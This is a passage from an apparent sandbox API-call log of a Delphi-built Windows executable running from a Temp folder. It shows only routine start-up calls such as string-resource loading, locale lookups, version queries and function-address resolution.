cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0115.500] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0115.501] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0115.501] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0115.501] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x704438 [0115.501] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0115.501] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0115.501] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0115.501] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0115.501] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0115.501] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0115.501] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x14e80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0115.501] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0115.501] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0115.501] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0115.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0115.502] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0115.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0115.502] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0115.502] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0115.502] GetThreadLocale () returned 0x409 [0115.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0115.502] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0115.502] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0115.502] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0115.502] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0115.502] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x704448 [0115.502] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0115.502] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0115.502] GetLastError () returned 0x7a [0115.502] GetLogicalProcessorInformation (in: Buffer=0x14d99d0, ReturnedLength=0x12fab0 | out: Buffer=0x14d99d0, ReturnedLength=0x12fab0) returned 1 [0115.503] GetCurrentThreadId () returned 0xdec [0115.503] GetCurrentThreadId () returned 0xdec [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0115.503] GetThreadLocale () returned 0x409 [0115.503] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0115.503] GetThreadLocale () returned 0x409 [0115.503] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0115.503] GetCurrentThreadId () returned 0xdec [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0115.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0115.505] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0115.505] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0115.506] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0115.506] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0115.506] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0115.506] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=17229545635) returned 1 [0115.506] GetTickCount () returned 0x27695 [0115.506] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1b, wMilliseconds=0x370)) [0115.506] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1b, wMilliseconds=0x370)) [0115.506] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=17229561617) returned 1 [0115.506] GetTickCount () returned 0x27695 [0115.506] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1b, wMilliseconds=0x370)) [0115.506] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1b, wMilliseconds=0x370)) [0115.507] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x14e82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0115.507] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x14d288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0115.507] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x14e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0115.507] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x14e82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0115.507] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x14e82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0115.507] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x14e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0115.507] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0115.507] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x14ef48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0115.507] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0115.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x14e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0115.508] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0115.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0115.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x14ef48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0115.508] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0115.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0115.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x14ef48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0115.508] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0115.508] GetThreadLocale () returned 0x409 [0115.508] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0115.508] GetCurrentThreadId () returned 0xdec [0115.508] GetCurrentThreadId () returned 0xdec [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0115.508] GetThreadLocale () returned 0x409 [0115.508] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0115.508] GetThreadLocale () returned 0x409 [0115.508] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0115.508] GetCurrentThreadId () returned 0xdec [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0115.508] GetLocaleInfoW 